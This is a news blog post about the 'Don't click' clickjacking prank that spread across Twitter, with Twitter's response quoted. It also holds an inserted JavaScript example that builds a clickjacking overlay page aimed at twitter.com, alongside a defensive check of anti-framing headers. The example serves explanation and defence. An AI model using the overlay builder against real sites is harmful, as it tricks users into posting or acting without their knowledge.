
Twitter and the dangers of clickjacking

Written by Andrew Nusca, Contributor

Right now -- yes, right now, as you're reading this post -- Twitter users are, well, a-twitter about an innocent but indicative joke that some clever person just played on half the Twitterverse.

The trick? A simple clickjacking maneuver: a link sent from a user to his or her followers, leading to a page that loads Twitter inside a transparent iframe positioned over a visible button. When the victim clicks the button, the click actually lands on Twitter's own submit button in the hidden frame, and the same message is posted again from the victim's account.
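To make the mechanics concrete, here is an added example (not code from the original post, and not anything Twitter published): one function builds the kind of page described above, a visible decoy button with an invisible iframe of the target laid on top of it, and a second function checks a target's response headers to decide whether a browser would let that page be framed at all, which is the check a practitioner runs before worrying about overlays. The target URL, origins, button label and pixel offsets are assumptions; how the framed form gets its message pre-filled is not described in the post and is left out.

```javascript
// Added example, not from the original article. All URLs, labels and
// pixel offsets below are assumptions chosen for illustration.

// Attacker side: the decoy is what the victim sees; the iframe of the
// target is sized and offset so its real submit button sits exactly over
// the decoy, made invisible with opacity:0 and stacked on top with z-index
// so it, not the decoy, receives the click.
function buildClickjackPage(targetUrl, decoyLabel) {
  return `<!doctype html>
<html><head><style>
  #decoy  { position:absolute; top:100px; left:100px; width:120px; height:32px; }
  #target { position:absolute; top:-180px; left:-400px; width:800px; height:600px;
            opacity:0; z-index:2; border:0; }   /* offsets are assumed values */
</style></head><body>
  <button id="decoy">${decoyLabel}</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// HTTP header names are case-insensitive, so look them up that way.
function getHeader(headers, name) {
  const want = name.toLowerCase();
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() === want) return v;
  }
  return undefined;
}

// Defender side: given a target's response headers, would a browser that
// honours them embed the page in a document served from attackerOrigin?
// Models the two controls browsers apply today: CSP frame-ancestors (which
// takes precedence when present) and X-Frame-Options DENY / SAMEORIGIN.
// Host wildcards such as *.example.com and the obsolete ALLOW-FROM are not
// modelled; an unknown X-Frame-Options value is ignored, as browsers do.
function canBeFramedBy(headers, targetOrigin, attackerOrigin) {
  const attacker = attackerOrigin.toLowerCase();
  const csp = getHeader(headers, 'content-security-policy');
  if (csp) {
    const directive = csp.split(';')
      .map(d => d.trim())
      .find(d => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1).map(s => s.toLowerCase());
      // An empty source list matches nothing, the same as 'none'.
      if (sources.length === 0 || sources.includes("'none'")) return false;
      if (sources.includes('*')) return true;
      return sources.some(src =>
        (src === "'self'" && attacker === targetOrigin.toLowerCase()) ||
        src === attacker ||
        // scheme-only source such as "https:" matches any origin on that scheme
        (src.endsWith(':') && !src.includes('/') && attacker.startsWith(src)));
    }
  }
  const xfo = getHeader(headers, 'x-frame-options');
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === 'DENY') return false;
    if (value === 'SAMEORIGIN') return attacker === targetOrigin.toLowerCase();
  }
  return true;   // no recognised anti-framing header: the page can be framed
}

// Headers a site serves to refuse framing by anyone else (both, for old browsers).
function hardenedHeaders() {
  return {
    'Content-Security-Policy': "frame-ancestors 'self'",
    'X-Frame-Options': 'SAMEORIGIN',
  };
}

// Constructed scenario, not a real capture: the target origin and attacker
// origin are assumptions.
const TARGET = 'https://twitter.com';
const ATTACKER = 'https://evil.example';
console.log(buildClickjackPage(`${TARGET}/home`, "Don't click"));
console.log('frameable with no headers:', canBeFramedBy({}, TARGET, ATTACKER));
console.log('frameable when hardened:', canBeFramedBy(hardenedHeaders(), TARGET, ATTACKER));
```

The header check is deliberately the first thing to run against a form you suspect is clickjackable: if `canBeFramedBy` returns false for a foreign origin, the overlay page above never renders the target and the rest of the attack is moot.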

Instant-mania. Within an hour, everyone I follow was tweeting "What's going on?" and "I didn't do that!" and, soon enough, "Don't click 'don't click'."

Then guilt:

Here's the entire Twitterverse already buzzing with backlash:

Two interesting phenomena to observe: first, how gullibility on the part of the user can sweep through an instantaneous microblogging service such as Twitter more rapidly than an airborne pathogen; second, how quickly those same people figure out the problem and alert their followers:

A rapid wave of destruction, followed by a rapid wave of aid.

I'm no security expert -- I'll leave that to ZDNet's Zero Day team -- but it appears to me that Twitter makes it very, very easy to suck a lot of users into a compromised situation very quickly. This example was innocuous; next time, it could be worse.

UPDATE: Twitter's on the case:

Some folks have noticed links from accounts they follow prefaced by the words, "Don't click," which of course people want to click right away. The links take you to a web site employing a technique called clickjacking. This technique seeks to trick web users and can take action on your behalf while you perform seemingly unrelated tasks.

As Wikipedia states, clickjacking is "a vulnerability across a variety of browsers and platforms; a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function." In this case that "other function" was posting a link to your Twitter account so that more people could be tricked and the cycle could perpetuate.

Thankfully the harm was restricted to constant reposting of the link, but we take malicious attacks on Twitter users very seriously and this morning we submitted an update which blocks this clickjacking technique.

As a result, all the "Don't click" tweets have been removed from users' Twitter rivers. Gone -- just like magic. (You can still find some using Google cache, though.)

UPDATE 2/13: Looks like another clickjacking attempt!
